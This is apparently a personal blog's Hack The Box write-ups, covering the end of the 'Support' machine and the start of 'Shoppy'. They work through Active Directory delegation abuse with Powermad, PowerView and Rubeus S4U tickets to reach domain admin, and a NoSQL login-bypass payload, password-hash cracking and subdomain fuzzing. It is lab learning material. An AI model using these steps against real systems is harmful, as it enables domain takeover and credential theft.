Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> dir
*Evil-WinRM* PS C:\Users\support\Documents> cd ../
*Evil-WinRM* PS C:\Users\support> dir
Directory: C:\Users\support
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         5/28/2022   4:17 AM                Desktop
d-r---         5/28/2022   4:16 AM                Documents
d-r---          5/8/2021   1:15 AM                Downloads
d-r---          5/8/2021   1:15 AM                Favorites
d-r---          5/8/2021   1:15 AM                Links
d-r---          5/8/2021   1:15 AM                Music
d-r---          5/8/2021   1:15 AM                Pictures
d-----          5/8/2021   1:15 AM                Saved Games
d-r---          5/8/2021   1:15 AM                Videos
*Evil-WinRM* PS C:\Users\support> cd Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir
Directory: C:\Users\support\Desktop
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         3/12/2023   3:37 AM             34 user.txt

*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
e56▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓699

Support Privilege Escalation

Back to information gathering for a moment. Now that we have a foothold on the system as the support user, we can find out more about this user. The command below shows the groups that this user belongs to. One of these groups is the Shared Support Accounts group that showed a path to Domain Admin in Bloodhound.

*Evil-WinRM* PS C:\Users\support\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name                                 Type             SID                                           Attributes
========================================== ================ 
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
SUPPORT\Shared Support Accounts            Group            S-1-5-21-1677581083-3380853377-188903654-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Bloodhound shows that the Shared Support Accounts group has a GenericAll path to the Domain Controller. While I still need to learn in detail what it means, I think it allows us to create an object like a computer. We can then use that object to get Kerberos tickets and take over the domain.

Support Bloodhound GenericAll
Support Bloodhound GenericAll

The following command shows that we as the support user can create up to 10 machines on the domain.

*Evil-WinRM* PS C:\Users\support\Desktop> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

DistinguishedName         : DC=support,DC=htb
ms-DS-MachineAccountQuota : 10
Name                      : support
ObjectClass               : domainDNS
ObjectGUID                : 553cd9a3-86c4-4d64-9e85-5146a98c868e

Ok, we now need PowerView so I will upload that.

*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Downloads/ApacheDirectoryStudio/PowerView.ps1
Info: Uploading /home/kali/Downloads/ApacheDirectoryStudio/PowerView.ps1 to C:\Users\support\Desktop\PowerView.ps1                               
Data: 1027036 bytes of 1027036 bytes copied

Now I import PowerView.

*Evil-WinRM* PS C:\Users\support\Desktop> . ./PowerView.ps1

And then we check if a value is present.

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

Now we need to upload something called Powermad.ps1 and import it. Once we have done that we can create a fake computer. I understand what it’s doing but I honestly have no clue about this process and why the different tools are needed. This is something I will have to look into later.

*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Downloads/ApacheDirectoryStudio/Powermad.ps1
Info: Uploading /home/kali/Downloads/ApacheDirectoryStudio/Powermad.ps1 to C:\Users\support\Desktop\Powermad.ps1
                                                        
Data: 180768 bytes of 180768 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Desktop> . ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FAKE-COMP01 added

Then we verify that the computer has been added.

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity FAKE-COMP01
DistinguishedName : CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb
DNSHostName       : FAKE-COMP01.support.htb
Enabled           : True
Name              : FAKE-COMP01
ObjectClass       : computer
ObjectGUID        : 43752191-b624-431b-aa19-6d74f6870d39
SamAccountName    : FAKE-COMP01$
SID               : S-1-5-21-1677581083-3380853377-188903654-5601
UserPrincipalName :

*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount

DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity

msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}

Now we use Rebeus to create a hash.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Calculate Password Hash(es)
[*] Input password             : Password123
[*] Input username             : FAKE-COMP01$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostfake-comp01.support.htb
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
[*]       aes128_cts_hmac_sha1 : 06C1EABAD3A21C24DF384247BC85C540
[*]       aes256_cts_hmac_sha1 : FF7BA224B544AA97002B2BEE94EADBA7855EF81A1E05B7EB33D4BCD55807FF53
[*]       des_cbc_md5          : 5B045E854358687C

Then generate the tickets.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:FAKE-COMP02$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: S4U
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP02$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFhDCCBYCgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBFIwggROoAMCARKhAwIBAqKCBEAEggQ8efPlvCvnHeLGwMpB/FRl7w+bfEHnyDrE8A1rhk5Y7ib7avJPusHw+jyleo+WiMVpgTZbU8y5saX6kvxVkCfZ/57oKpa2gU3lGQUcCQf4hlj0tvHzRV3Nexutn53f1FgNhb+aTcsvTcwSP6lhLDX41TKO9njnbsZspNG202KV5CgtMRasrKs/j1Sahh55LNrF5y0GvtnXe/iRervKEDGPgGJf1GIY/AyrX+BwV70KiMwN+7/4Ihpgh2w5+SpXv6oa8ip1zUU2S4LAawunCL6FzNz7EKsmPN8qlJVI1bPeyRQN3lNDNvM9DAVJYl/PveGrufA46P25HTays8SN7EvLNGMSKuSqUDzF3nKIuT3TfWDc/W59Lm26/vlAVBhrht5OUNnQAWFLk4rR9cgeSanybmvYF9Rtktsv9BdmdZeAqRPz14fVhZm8KWSHKEKSazaNZscYlstX8oVYl8uZblh31A0yMnK0dPdL8VZPhlpVZOaBIfGr4E4dzeSkcRixxFCIvBFHvVPxABY0xDP5iC7ErtrpGUbiVTU7EcMtUkVUvsSZwE//xjpFYhkgoIgb3Kk1w1hdrXG2Qllrc33GyxOxtnE+e+8pAjagslFi65mU31V3yQU+yNSsYg3x/SSj+npikPOXC9Ue35SNDkyvR2UFlx/7V++iezeuDMNSaYgaXbBynLVJmd45fS2mkZ9KsIRWbXC9VTiEsjiNFXCoNHlRe5H400LMSD9HNXaFn8aQwAEFG4bOky0zxCWe/lMqiv9InlHhvL1/W7z++SkuxDTPWPmC69ClzenxTq+ymT+fGI4CV4z+Ys2lGOfv4egiLwAgE2h1yL09Lf7hVdVl3dwAZIcXUMSX//XkztOtoe3wHgmRVpBVVqNLQV7PSY8BnXYmNxP+xvq0xr677IpPrIFLEZ7j5G1+4B+fD4vQmLknelprY1RR0OoI/Db+Tzt5N43d3D3lP/4kFUMAo6Mi9X3iLexpgLuc9jYT0vXllK9/lKZbVeTPFGZjGKFxxupScWIsHkm5XKJStuCflWdu7ga4JiLPKbWZtGEa2SNpV2bimZAsPEtu0VV8D74otvuc4KF8SHQo3i6gKTUzYd7zadrWw22ULWRuGsbe6PxogCnsrtdMsP7V9Hq15S6QWMjVIJlG0j/RNU4KFOjNddE18WH7FFb8YURhGAznQ6z9AED61pSf4ToHhwOE34EvGMiWa+5Dz456QQBba/2RESG1tfCGg8qUYSHaHg4vN04ZdwnWU84tc1il3W0hV0hUqHhxrhX8xaIXfV9tvvDmWx28ZZuztpv+yGSMDoiz/lbsJCvKPUNquw9wMSUrKVJ5E8kSUcLq6c2R2jUGivtWb7YdRCByqSivlWOaGSUDOg53SCxkK/B2XFH7q3JxT7x1sh/5fVtxuH5OjUuFTvM6n950SPsCxjpk7stq9LWzmGL/NKOB1zCB1KADAgEAooHMBIHJfYHGMIHDoIHAMIG9MIG6oBswGaADAgEXoRIEEC1RKcirbjy1WegGHu+c+TahDRsLU1VQUE9SVC5IVEKiGTAXoAMCAQGhEDAOGwxGQUtFLUNPTVAwMiSjBwMFAEDhAAClERgPMjAyMzAzMTIxNzEzMjlaphEYDzIwMjMwMzEzMDMxMzI5WqcRGA8yMDIzMDMxOTE3MTMyOVqoDRsLU1VQUE9SVC5IVEKpIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC3N1cHBvcnQuaHRi

[*] Action: S4U
[*] Building S4U2self request for: '[email protected]'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):

doIFrDCCBaigAwIBBaEDAgEWooIExjCCBMJhggS+MIIEuqADAgEFoQ0bC1NVUFBPUlQuSFRCohkwF6ADAgEBoRAwDhsMRkFLRS1DT01QMDIko4IEhzCCBIOgAwIBF6EDAgEBooIEdQSCBHHlYkjjpNRXDF2DN/kk0XLz4PmK9j1M6a54M1o5sTTe4fo0i+dBRqG813m4L2XQlnzCRPQGQtJvtxk2cKgU6AgZ21eqYg8d6zhsCCl9LBiPV57mwyIw094dRno+zbTuELr9nRN3Ipot3fTx6yTP3/SuTEp6CcJVbqiJRShZ9hYHlKED4HvfGpy10/NmZG6Nwk2ZHm2jvHxO+y2nOzabGM2gZqDSPskrKP98drvsDv0vjqbAwINFlxcFOiVm4yOHpGVFOpmcscR+1t0x9hPR/Lr29E3SR+ftbC482T9P6Lo6/MXCHESCJiZcGFOknnYBZDfpU1Y5EvvEEhoRfXMQ82VzsnkMcCxaFl8k8RBaW/Iq8fTesAwZvKn3W6OFIBcA7R0IBWi8IMpf377v32xNpneVvWM71VDQbbhyXBlfr8+qwfbPeHJ9eDa1ZduVUhYhOHXsCZvVJtg90KrBQM8U7dUnpLaanTGnj/lstyMb7vFyyxmm9X3LPgXhloSvINKy9iJw0/IAZJmyJwhJx8CVA62dTU8K/71MyHQPmDwbvaUj+qjWy9WiNUgwYPp6SUpOWNTYzkN2AlHM/fvlqMBVXOHrKoAc6mUCK1u6c8SODU0MKCK6d+BG9495x9rm2Cuncvx9GUlQ+QYv2HxHXDVFd/tr7hvyKoa47JoihR19inl2ZVeWxyPZ+kypomIIM6qN1mqYvOOgGbnc9583VqGuiZwFx5zuU5an/Tilw7Y2yulnFihPn/14q47rVpRwPT+lL2T6XPFbIcic40v39OAsvbBYdVTJ2XGk7md3dlrabDLDHa+bIbasqTKBZqaEeXBW/2mB1lEikSmUdenYz+a7Tz5BhcMRycusVFKVQYLo5wkgZNGx4RLS3bJKmpElZJDFbijWJwItf/uTaUWu/EBkm94uYZ6Si8o708eQ7LvJgBwxBGa9sYiK9QhPgNZ1yYOgveGKWBbs3e4+uQN97U52RNygD2uHyhM/PwMS8SC4OmHqL8JrdCWg9D5D3HN6WE8oelVHL7L3jzGBKv9zFDSAOqkZ571/M5/5fozuHLWhxLc+PNKN4BSGs3CtlsugILpZRjU5HUPVplamHvaJHKIaWQ63ruLbMkSi/6+wrAE/045itcFQBVgqEBGlWeH/JFZwHOesV4itWCKB4meihsto71G7VKLBHa6yXotZVje+x7GY2dm2TYLYJnTHSJB4R4lFmGrN30LMZftC3NG2E0HKhU2n2lLwXKLinLrB0oH2CucFPJfFW9yZgA5cPWcPKXENgEI1bPLnYg8ZxAYcDGpb6Iaw+GT/SRiYMxD5wQfT4EK8n0IoZk1VFKorwCrXAOEHJaoX+ELa5Wpw2oVoluf8X12C9kO1L4tqLAIhebgG6SMXLHOrGdYP11Bx3iNPID2k7UoSVhDM9uPKlPc6Pxhp0leunGfwDtfaBt4v0Xl2o6OfxRMZZy6pKMlRW4QYPVukZgB9P0E31ZaCRjunUQk6n5V/eUHAVvRbjvvWwly0xzwYcZmjgdEwgc6gAwIBAKKBxgSBw32BwDCBvaCBujCBtzCBtKAbMBmgAwIBF6ESBBBDl3mhADCz3Q7sDHFBKYHGoQ0bC1NVUFBPUlQuSFRCohowGKADAgEKoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKEAAKURGA8yMDIzMDMxMjE3MTMyOVqmERgPMjAyMzAzMTMwMzEzMjlapxEYDzIwMjMwMzE5MTcxMzI5WqgNGwtTVVBQT1JULkhUQqkZMBegAwIBAaEQMA4bDEZBS0UtQ09NUDAyJA==

[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
      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
[+] Ticket successfully imported!

Then we have to convert the tickets.

──(kali㉿kali)-[~]
└─$ sudo python3 /usr/share/doc/python3-impacket/examples/ticketConverter.py new.kirb ticket.ccache
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] converting kirbi to ccache...
[+] done

And finally, we can connect to the host.

┌──(kali㉿kali)-[~]
└─$ KRB5CCNAME=ticket.ccache /usr/share/doc/python3-impacket/examples/psexec.py support.htb/[email protected] -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[] Requesting shares on dc.support.htb….. [] Found writable share ADMIN$
[] Uploading file pjlBUiQm.exe [] Opening SVCManager on dc.support.htb…..
[] Creating service hnLw on dc.support.htb….. [] Starting service hnLw…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Now we can get the root flag.

C:\Windows\system32> cd C:\Users\Administrator\Desktop 
 
C:\Users\Administrator\Desktop> type flag.txt
The system cannot find the file specified.

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 955A-5CBB

 Directory of C:\Users\Administrator\Desktop

05/28/2022  04:17 AM    <DIR>          .
05/28/2022  04:11 AM    <DIR>          ..
03/12/2023  03:37 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,943,952,384 bytes free

C:\Users\Administrator\Desktop> type root.txt
665▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓311

Support Conclusions

You want to know something funny, you might not find it funny but in hindsight, it’s pretty hilarious. I just read through the Hack The Box academy module “Learning Process”. It’s a great module which has a lot of information about how best to learn new things. One of the sections mentions frustration and how Cybersecurity can be frustrating due to being outside your comfort zone. This machine frustrated me! Even being mindful of being frustrated it still made me want to rip my hair out (I’m bald).

It’s all my own fault admittedly, not having the correct tools, tools breaking and general lack of knowledge. I started this box at on Sunday at 10:00 am. It is now 13:52 and I still don’t have a foothold. Crackmapexec broke on Parrot so I span up a Kali instance. Kali didn’t have all the required tools so I had to install some.

Then, I wanted to get Wine set up but that failed, so many hurdles just to be able to play. Linux and penetration testing distributions have come a long way since the first time I installed BackTrack but come on! Why the fuck am I spending half a day trying to fix broken dependencies just to run a flaky as fuck virtual environment to launch a tiny executable which only queries an LDAP server, just so I can capture a password! Some days, even when you have the answers, you just have problem after problem. And now I need to set up Neo4j and Bloodhound FML!

Coding

My lack of coding ability is holding me back in this industry. It’s actually becoming a big insecurity for me and something I reflect on frequently. However, I have spoken to many people who are great at infrastructure and web testing who claim they don’t know a thing about coding. What am I missing here? Every machine that I get stuck on tends to involve analysing some code for weaknesses or reversing something in binary. How am I supposed to understand that without fully understanding what the code is actually doing? Anyway rant over, I’m hoping that something will eventually click and I will realise that I’ve been approaching the problem wrong.

Hack The Box Shoppy Writeup

Hello world and welcome to Haxez, today I’m going to be working through the retired Hack The Box Machine Shoppy. I’m currently going through all the retired machines to try and upskill myself while studying the CPTS academy material. It’s also great to see the effort that has gone into making these machines. Each machine is like an episode of your favourite TV show, you don’t want to miss anything. Please note that I followed IppSec’s Shoppy Youtube video when getting stuck.

Shoppy Enumeration

Once the machine has started I connected to the VPN and started pinging the box to make sure I could talk to it. After confirming the box was online, I scanned it with Nmap to see what services were listening. As you can see from the output below, SSH and HTTP were open.

Nmap scan report for 10.129.227.233
Host is up, received echo-reply ttl 63 (0.013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.4p1: 
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
80/tcp   open  http     syn-ack ttl 63 nginx 1.23.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: nginx/1.23.1
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.

As HTTP was the only thing open that had a sensible attack surface, I visited the machine’s IP address in my browser. Unfortunately, I got an error due to a redirect in place. In order to resolve this, I echoed the domain name into my host file with the IP address of the box. This would ensure that the domain resolves to the correct IP address and that the redirect works.

┌─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo echo "10.129.227.233 shoppy.htb" | sudo tee -a /etc/hosts
10.129.227.233 shoppy.htb

Upon visiting the domain, I was presented with a countdown. No discernible technology was evident. I viewed the page source and looked at the various javascript files but couldn’t identify a framework or cms.

Shoppy
Shoppy

Whatweb didn’t provide much information either.

┌─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo whatweb http://shoppy.htb
http://shoppy.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.23.1], IP[10.129.227.233], JQuery, Script, Title[Shoppy Wait Page][Title element contains newline(s)!], nginx[1.23.1]

I started poking the application with various strings to attempt to force an error. The generic 404 error returns the response “Cannot GET” followed by the requested file. From this, we can deduce that the application was built with Node.js.

Cannot Get
Cannot Get

No Access to No SQLI

Next, I ran gobuster against the application to see if there were any hidden directories or files. As seen below, the results of gobuster found an admin and login area as well as some other generic files. It’s probably safe to assume that the login admin area is where the creator of the box wants us to go.

┌─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo gobuster dir -u http://shoppy.htb/ -w /usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://shoppy.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/11 09:36:20 Starting gobuster in directory enumeration mode
===============================================================
/Admin                (Status: 302) [Size: 28] [--> /login]
/admin                (Status: 302) [Size: 28] [--> /login]
/ADMIN                (Status: 302) [Size: 28] [--> /login]
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/favicon.ico          (Status: 200) [Size: 213054]             
/fonts                (Status: 301) [Size: 177] [--> /fonts/]  
/images               (Status: 301) [Size: 179] [--> /images/] 
/js                   (Status: 301) [Size: 171] [--> /js/]     
/Login                (Status: 200) [Size: 1074]               
/login                (Status: 200) [Size: 1074]                                                   
===============================================================
2023/03/11 09:36:30 Finished

The login area didn’t give much away. For a moment, I thought I was logging in to my Activision/Blizzard account. So next, I started poking at the parameters of the login box. Initially, I captured it with Burp and tried the usual suspects, code execution and SQL injection. However, this is Node.js and is likely to use a NoSQL database. Admittedly, I didn’t know that until I watched a video about it. Anyway, the application login can be bypassed with ‘admin’||’1’==1’.

No SQL Injection
No SQL Injection

Once inside the application, I had access to a search box that lets you search for users. Searching for admin gave me the admin password hash. We can also perform a SQL injection on this form too and get it to spit out the other users of the application.

All Shoppy Users
All Shoppy Users

Hash Cracking

To proceed, I saved the hashes into a file and used John and rockyou.txt to crack them. As shown below, John was only able to crack one of the hashes. I will come back to the other one later and use a large wordlist if necessary.

┌─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo john --format=Raw-MD5 hashesh --wordlist=/media/sf_OneDrive/Wordlist/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
remembermethisway (?)
1g 0:00:00:23 DONE (2023-03-11 11:30) 0.04286g/s 614801p/s 614801c/s 649613C/s  filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

We can use Josh’s password to login into the application but it only provides us with the same functionality we had before. Time to go back to information gathering.

Shoppy Further Enumeration

In order to proceed, I used the ffuf fuzzing tool to brute force subdomains. As you can see from the output below, it found the subdomain of mattermost. I’ve heard of mattermost but I can’t remember ever using it. I believe it is some type of chat application.

┌─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $sudo ffuf -u http://shoppy.htb/ -H "Host: FUZZ.shoppy.htb" -w /media/sf_OneDrive/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -fw 5
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________
 :: Method           : GET
 :: URL              : http://shoppy.htb/
 :: Wordlist         : FUZZ: /media/sf_OneDrive/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.shoppy.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 5
________________________________________________
mattermost              [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 18ms]
:: Progress: [100000/100000] :: Job [1/1] :: 3117 req/sec :: Duration: [0:00:42] :: Errors: 0 ::

In order to visit this subdomain, I echoed it into my host file. This gave me a login page which I was able to login to with the username Josh and the password we just cracked. Once the page loaded, it was evident that it was a chat application similar to Slack. Furthermore, I searched through the different channels and found a set of credentials. This a daily reminder not to share credentials in plaintext… ever.

Shoppy Mattermost
Shoppy Mattermost

